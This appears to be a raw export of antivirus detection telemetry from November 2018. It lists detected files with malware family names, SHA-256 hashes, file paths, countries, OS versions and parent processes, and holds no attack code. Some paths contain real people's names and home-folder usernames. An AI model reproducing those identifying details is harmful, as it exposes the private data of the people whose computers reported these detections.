  Row(detection=Row(filename='avscan-20181101-181103-5de7b414', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_553d2933\\AVSCAN-20181101-181032-591EF36A\\AVSCAN-20181101-181103-5DE7B414', filesize=512000, name='HEUR/AGEN.1026005.#M1.#R1'), hash='311de4b50ea9c705f68012ec6564a0a78e94bc4f047e3a6f8dd9a859a44341c2', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:11:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T04:23:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-221758-30ad84c2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b80b552\\AVSCAN-20181101-221727-2C4F1836\\AVSCAN-20181101-221758-30AD84C2', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:17:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T11:44:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='t0.ax', filepath='\\?\\C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\FileZilla Server\\07 958\\t0.ax', filesize=448000, name='Adware/FileTour.wry.#M1.#R1'), hash='07f5273a5ad4248030d732407f1a18edbadb1a63d281200a63e09b75c30185eb', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:00:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xerces-c_1_6_0.dll', filepath='D:\\AutoCAD2009\\x86\\xerces-c_1_6_0.dll', filesize=1536000, name='W32/Ramnit.A.#M1.#R1'), hash='44d73b70f5bc66adb08c739dd549e80534b79cc3b6a7507b3aea447f58425db0', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:37:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-004830-da9b1e89', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d97a9cc7\\AVSCAN-20181102-004808-D5DDF8DF\\AVSCAN-20181102-004830-DA9B1E89', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:48:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000a8f8d', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000a8f8d', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:49:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-193011-86a2e31f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_93383960\\AVSCAN-20181101-193001-851F8215\\AVSCAN-20181101-193011-86A2E31F', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:30:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-231149-50268aa4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_436c5dab\\AVSCAN-20181101-231105-48F2CF31\\AVSCAN-20181101-231149-50268AA4', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:11:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215321-a55f6c70', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c1e90201\\AVSCAN-20181101-215312-A366E175\\AVSCAN-20181101-215321-A55F6C70', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:53:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kmpcode_4053autoupdate[1].exe', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\EXOWRW4S\\KMPCode_4053autoupdate[1].exe', filesize=64000, name='ADWARE/Adware.Gen7.#M300.#R602524'), hash='747a74320da5f16ebe9ff0ec81c180948bb80b30c1c3fe6fdfe904a5bd7e5d6e', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:11:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00000862', filepath='C:\\Windows\\Temp\\tmp00000159\\tmp00000862', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T11:38:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160654-3df46aa1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-160645-3CD94395\\AVSCAN-20181101-160654-3DF46AA1', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:06:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\xumvimxey52\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1541047614.5bda853e876ec', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Backs\\701317936.exe', parentsize=671232, timestamp='2018-11-01T11:50:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a58b659f922447d16438b55b3f196e8b34d909261912fbae2aff8ea218c08af7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\A58B659F922447D16438B55B3F196E8B34D909261912FBAE2AFF8EA218C08AF7', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='a58b659f922447d16438b55b3f196e8b34d909261912fbae2aff8ea218c08af7', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:14:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='dc86dd6c1b8d4af8cb1d2d250a3c78d9d21d5314f73bd753e4778c47942c098f', metadata=Row(cmdline='\\\\\\/Embedding', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-01T01:41:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\p2poyzirs2u\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T01:59:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='newfolder.exe', filepath='G:\\NewFolder.exe', filesize=0, name='TR/Spy.Gen.#M2.#R1185'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:48:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150324-bbc3dcd2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_36c54126\\AVSCAN-20181101-145905-8A15D273\\AVSCAN-20181101-150324-BBC3DCD2', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:03:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ee0d9b5f3435dc36d63c044397b48b91eb0ddece7182acbe0e4c9e817aa6b1c8', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\EE0D9B5F3435DC36D63C044397B48B91EB0DDECE7182ACBE0E4C9E817AA6B1C8', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='ee0d9b5f3435dc36d63c044397b48b91eb0ddece7182acbe0e4c9e817aa6b1c8', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:21:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bonetti erika.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\engim varie\\STAGE 574309\\BONETTI ERIKA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:28:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='salute del perineo.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\SOCIO SANITARI\\SALUTE DEL PERINEO.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:13:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='comprensionemusicale.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\ITALIANO\\comprensionemusicale.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:25:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151025-041d802b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151025-041D802B', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:10:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='newfolder.exe', filepath='F:\\NewFolder.exe', filesize=0, name='TR/Spy.Gen.#M2.#R1185'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:07:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-195003-bd256f0d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-194803-A89BA1A8\\AVSCAN-20181101-195003-BD256F0D', filesize=64000, name='TR/Siggen.cucmw.#M1.#R1'), hash='db6f79265933c5ec30247d757b221f8d5694e189970243bede519902113fc960', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:50:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hyshgrek.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\hySHGREK.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='dc86dd6c1b8d4af8cb1d2d250a3c78d9d21d5314f73bd753e4778c47942c098f', metadata=Row(cmdline='\\\\\\/Embedding', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-01T09:11:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='c4242840038e90e0989bfaf60d861bb1e2b10f85a8f7d19b5b05a8c317f3aa82', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T17:22:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yxkxrxag.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\yXkxrxaG.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='spywareterminatorsetup.2.exe', filepath='\\\\?\\E:\\virus\\SpywareTerminatorSetup.2.exe', filesize=8152000, name='W32/Neshta.A.#M1.#R1'), hash='c88d6df0a77a3285bd7c7443575f480634acfc322d1208c780a7f8813d7daf6a', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:46:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151834-61f654b1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151834-61F654B1', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:18:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\05tsmva4wib\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T04:53:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d02cf1f559cfb2b7aa152bed46699c2ea76d378f03c14d04432c486e01b76c35', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\D02CF1F559CFB2B7AA152BED46699C2EA76D378F03C14D04432C486E01B76C35', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d02cf1f559cfb2b7aa152bed46699c2ea76d378f03c14d04432c486e01b76c35', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:10:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\PROGRAM FILES\\AVIRA\\ANTIVIRUS\\AVIRASECURITYCENTERAGENT.EXE', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\\\\\/LOGFILE=\\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Avira\\\\\\\\Antivirus\\\\\\\\LOGFILES\\\\\\\\AviraSecurityCenterAgent-2018-11-03-07-04-23.log\\\\\\" \\\\\\/LOGLEVEL=\\\\\\"STANDARD\\\\\\" \\\\\\/UPDATE_WSC=\\\\\\"ENABLE\\\\\\" \\\\\\/VDFDATE=\\\\\\"2018-10-22T00:00:00\\\\\\" \\\\\\/TRIGGER=\\\\\\"gpschd.dll Cyclic Check\\\\\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\avirasecuritycenteragent.exe', parentsize=840000, timestamp='2018-11-04T01:14:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='winbox.exe', filepath='D:\\winbox.exe', filesize=192000, name='W32/Sality.AT.#M1.#R1'), hash='3d6c50af69cb54c2ff8937975591890b946c4efe5fc3619ffb56093da09f95db', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T00:15:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131740-345cc0c2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131740-345CC0C2', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:17:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00023d7c', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp00023d7c', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:41:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='keygen.exe', filepath='H:\\Azaro vst 2\\Peter Siedlaczeks Complete Classical Collection\\KeyGen.exe', filesize=128000, name='HEUR/AGEN.1000518.#M1.#R1'), hash='3dbf0efed4c7c9bf038644680c32b0d79ead6fe9d7dcc21b544ce1511aa5e304', metadata=Row(cmdline='\\\\\\/s', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Elaborate Bytes\\VirtualCloneDrive\\VCDDaemon.exe', parentsize=85160, timestamp='2018-11-04T01:24:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000ab170', filepath='C:\\Windows\\Temp\\342e7ceb-d93d-4c8c-a51a-9c27e99af2f0\\tmp0000015c\\tmp000ab170', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.4.942.11595\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-04T13:37:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131406-2437cef0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-131406-2437CEF0', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:14:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T06:11:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-144431-9db05bd4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6125d533\\AVSCAN-20181104-135312-59F9F13F\\AVSCAN-20181104-144431-9DB05BD4', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='489494dcf2a8596e3d4ec8b6b3f157f9c745394a6f607c6890ab344191ae8261', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:14:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-144341-6f800d5c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_26240ba0\\AVSCAN-20181104-144218-67874F60\\AVSCAN-20181104-144341-6F800D5C', filesize=3520000, name='HEUR/AGEN.1004753.#M1.#R1'), hash='76d78fd29cb242c3013c375f10d7debda6f2294bec9dddbef02796360c8bd36b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T16:43:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00004d52', filepath='C:\\Windows\\Temp\\db829342-bc18-47c8-884b-f644b23c14b6\\tmp00000479\\tmp00004d52', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='69a71e26ddd4707526871ab5aad14d241f9aa3f800e66366a51d6272686fa049', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Lavasoft\\Ad-Aware Antivirus\\Ad-Aware Antivirus\\11.12.945.9202\\AdAwareService.exe', parentsize=732056, timestamp='2018-11-04T10:04:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='adjprog.exe', filepath='C:\\Users\\X\\Documents\\Reset Epson Serie L\\Todos os Resets\\Epson Adjustment Program Resetter L350-L355-L550-L555-L110-L210-L300\\Adjprog.exe', filesize=5632000, name='TR/Crypt.XPACK.Gen2.#M300.#R100738'), hash='30832edce2c0babe49a581af32e7e4a87e257d22598bdcc3e501c0cecb1b33be', metadata=Row(cmdline='x -iext -ow -ver -- \\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Documents\\\\\\\\Todos os Reset Epson Serie L.rar\\\\\\" C:\\\\\\\\Users\\\\\\\\Usuario\\\\\\\\Documents\\\\\\\\', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1525192, timestamp='2018-11-04T16:53:48Z'), dt=datetime.date(2018, 11, 4)),
